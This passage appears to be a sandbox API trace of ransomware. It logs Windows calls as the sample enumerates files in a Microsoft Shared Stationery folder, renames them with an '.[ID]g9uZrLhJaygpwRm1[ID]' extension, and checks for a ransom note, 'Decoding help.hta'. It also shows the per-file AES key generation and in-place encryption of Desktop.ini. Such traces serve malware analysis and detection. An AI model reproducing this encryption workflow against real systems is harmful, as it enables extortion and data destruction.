lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" [0044.566] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif.[ID]g9uZrLhJaygpwRm1[ID]" [0044.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\cave_drawings.gif.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.566] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4d6850c, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4d6850c, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4434cc55, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x90f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connectivity.gif", cAlternateFileName="")) returned 1 [0044.566] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.566] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.566] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.566] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.566] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Connectivity.gif") returned 1 [0044.566] lstrlenW (lpString="Connectivity.gif") returned 16 [0044.566] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.567] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.567] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Connectivity.gif" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" [0044.567] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" [0044.567] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif.[ID]g9uZrLhJaygpwRm1[ID]" [0044.567] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.567] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x80425158, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bf1d2d9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bf1d2d9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x285, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0044.567] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.567] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.567] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.567] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.567] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Desktop.ini") returned -1 [0044.567] lstrlenW (lpString="Desktop.ini") returned 11 [0044.567] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.567] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.567] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Desktop.ini" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" [0044.567] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" [0044.567] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0044.567] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0044.568] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x704 [0044.568] CreateFileMappingA (hFile=0x704, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0044.568] CryptAcquireContextA (in: phProv=0x18bdfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bdfcec*=0x3448c70) returned 1 [0044.569] CryptGenKey (in: hProv=0x3448c70, Algid=0x6610, dwFlags=0x1, phKey=0x18bdfce8 | out: phKey=0x18bdfce8*=0x5da738) returned 1 [0044.569] CryptExportKey (in: hKey=0x5da738, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x18bdfbe4, pdwDataLen=0x18bdfce4 | out: pbData=0x18bdfbe4*, pdwDataLen=0x18bdfce4*=0x2c) returned 1 [0044.569] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x280) returned 0x40b0000 [0044.571] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x18bdfbe4*, pdwDataLen=0x18bdfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x18bdfbe4*, pdwDataLen=0x18bdfcf8*=0x100) returned 1 [0044.572] CryptEncrypt (in: hKey=0x5da738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x40b0000*, pdwDataLen=0x18bdfce4*=0x280, dwBufLen=0x280 | out: pbData=0x40b0000*, pdwDataLen=0x18bdfce4*=0x280) returned 1 [0044.572] UnmapViewOfFile (lpBaseAddress=0x40b0000) returned 1 [0044.573] CloseHandle (hObject=0x414) returned 1 [0044.573] CryptDestroyKey (hKey=0x5da738) returned 1 [0044.573] CryptReleaseContext (hProv=0x3448c70, dwFlags=0x0) returned 1 [0044.573] SetFilePointerEx (in: hFile=0x704, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.573] WriteFile (in: hFile=0x704, lpBuffer=0x18bdfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x18bdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x18bdfbe4*, lpNumberOfBytesWritten=0x18bdfcf8*=0x100, lpOverlapped=0x0) returned 1 [0044.574] WriteFile (in: hFile=0x704, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x18bdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x18bdfcf8*=0x500, lpOverlapped=0x0) returned 1 [0044.574] CloseHandle (hObject=0x704) returned 1 [0044.575] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0044.575] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5015d96, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc5015d96, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x444c9a01, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xed0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dotted_Lines.emf", cAlternateFileName="")) returned 1 [0044.576] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.576] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.576] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.576] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.576] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Dotted_Lines.emf") returned -1 [0044.576] lstrlenW (lpString="Dotted_Lines.emf") returned 16 [0044.576] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.576] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.576] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Dotted_Lines.emf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" [0044.576] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" [0044.576] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf.[ID]g9uZrLhJaygpwRm1[ID]" [0044.576] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Dotted_Lines.emf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\dotted_lines.emf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.576] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2acb98, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2acb98, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce04b5c8, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Garden.htm", cAlternateFileName="")) returned 1 [0044.576] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.576] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.576] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.576] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.576] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Garden.htm") returned -1 [0044.577] lstrlenW (lpString="Garden.htm") returned 10 [0044.577] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.577] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.577] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Garden.htm" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" [0044.577] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" [0044.577] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.[ID]g9uZrLhJaygpwRm1[ID]" [0044.577] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.577] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2acb98, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2acb98, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa410937, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x5d3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Garden.jpg", cAlternateFileName="")) returned 1 [0044.577] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.577] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.577] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.577] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Garden.jpg") returned -1 [0044.577] lstrlenW (lpString="Garden.jpg") returned 10 [0044.577] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.577] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.577] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Garden.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" [0044.577] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" [0044.577] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0044.577] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Garden.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.577] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc50881ad, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc50881ad, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x444efb5f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1594, dwReserved0=0x0, dwReserved1=0x0, cFileName="Genko_1.emf", cAlternateFileName="")) returned 1 [0044.578] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.578] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.578] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.578] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.578] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Genko_1.emf") returned -1 [0044.578] lstrlenW (lpString="Genko_1.emf") returned 11 [0044.578] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.578] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.578] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Genko_1.emf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" [0044.578] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" [0044.578] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf.[ID]g9uZrLhJaygpwRm1[ID]" [0044.578] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Genko_1.emf.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\genko_1.emf.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.578] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc50d4467, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc50d4467, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44515cbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2864, dwReserved0=0x0, dwReserved1=0x0, cFileName="Genko_2.emf", cAlternateFileName="")) returned 1 [0044.578] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: 